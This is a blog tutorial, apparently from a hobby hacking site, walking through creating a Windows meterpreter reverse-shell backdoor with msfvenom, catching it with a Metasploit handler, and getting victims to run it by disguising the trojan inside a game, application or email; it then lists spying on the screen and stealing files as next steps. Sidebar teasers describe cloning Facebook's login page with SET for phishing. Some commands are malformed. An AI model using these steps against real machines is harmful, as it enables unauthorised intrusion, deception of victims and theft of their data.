Hack a Computer on Your Network With Kali Linux Using The Metasploit

-
So you want to hack a computer and you've got Kali Linux installed?
If you don't have Click Here!

Step 1: Start Kali Linux

Open New Terminal

Create the PAYLOAD:
To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.

Type This Command...

msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe

Step 2: Start the Metasploit Console

Start the Metasploit console by typing: msfconsole
This will take a few moments...



 Follow by these Commands:


 In Metasploit... Type these commands

use exploit/multi/handler


In above step we set our exploitation method. In this step we need to specify the payload that we have created.

Type set payload windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445
Now  Exploit
msf exploit(handler) > exploit


Wait for the target to connect back


msf exploit(handler) > exploit

[*] Started reverse handler on "victims IP Like (192.158.1.104:444)"

[*] Starting the payload handler…



Execute the payload
Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned.
Example like this ...
[*] Started reverse handler on 192.158.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.158.1.105
[*] Meterpreter session 1 opened (192.158.1.104:444 -> 192.158.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter > "help"

Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more. use help command to see the whole list of commands.

Now you can do anything with victim's machine. You can shutdown, reboot victim's machine. You can steal files from that machine and upload files to that machine.  You can drop into system's shell. With that you can create a file on that machine, open a file, kill processes currently running on that machine and many more.






Comments

Post a Comment

Popular posts from this blog

Using Kali Linux: Perform Website Cloning via SET toolkit

-
Image
First open the Terminal in Kali Linux, Before initiating the SET, there are some other things which you need to know...those are, Step 1: check your IP address(Kali Linux) Step 2: check all the machines inside the network Command: Netdiscover –r 192.168.243.0/24 Then we got the network IP Default gateway Broadcast ip Ping the IP (unknown )to check whether host is live or not: Command: Ping 192.168.243.129 Now open social engineering framework in kali Linux Command: Setoolkit Click the First Option : 1- social engineering attacks Now since we have to perform the website cloning so we have to chose the option 2- Website Attack Vectors Then click on 5- Web Jacking Attack Method Then on Then choose the 2- Site Cloner After this it will ask you for an IP address (put your kali linux machine IP address) After this it will ask you to enter the URL of the website you want to clone. In this let's clone the Facebook  website Paste the URL in
Read more

What is Log4j Vulnerability ?

-
Image
Log4j also know as Log4Shell is one of the recent type of hac*ing methology which is initiated by Apache. What is Log4J attack? This is an open-source logging library, which is used by almost all major Java-based enterprise apps and servers across the industry. A logging library is used to keep track of all the activity inside an application. The flaw allows any hacker or cyber-criminal to control and execute ‘arbitrary code’ and gain access to a computer system by inputting a string of code into the library. This attack exploits the Log4j vulnerability to download a Trojan malware, which triggers a download of an .exe file, which in turn installs a crypto-miner. Once the crypto-miner is installed, it starts using the victim’s resources in order to mine for cryptocurrency for the attackers’ profit, all without the victim knowing they have been compromised The vulnerability is also dubbed as Log4Shell and was first highlighted by researchers at LunaSec. The issue was discovered in Micro
Read more

How To Stop Becoming a Bait (A Cyber Security Methodology)

-
Image
INTRODUCTION The expanding Cyber dangers suggest that people, little businesses, huge organizations, and government organizations are progressively concentrating on securing their frameworks against all shapes of cyber dangers. In layman terms, Cybersecurity is the act of securing standalone computers an arrangement of interconnected computers, person, organizational, and profoundly touchy government and national security information from harming Cyber assaults. This handle includes receiving an assortment of Cybersecurity concepts to suit wants of the clients. For a fledgling, the Cyber Security nuts and bolts and ideas incorporate knowing around keeping secure from mail tricks, malware, infection, wi-fi security, budgetary tricks, phishing tricks, secure utilize of web devices like social media, and more. Indeed smartphones are progressively getting to be an indispensably portion of our day by day lives and require some basic security. Apprentices need to get it a few essential co
Read more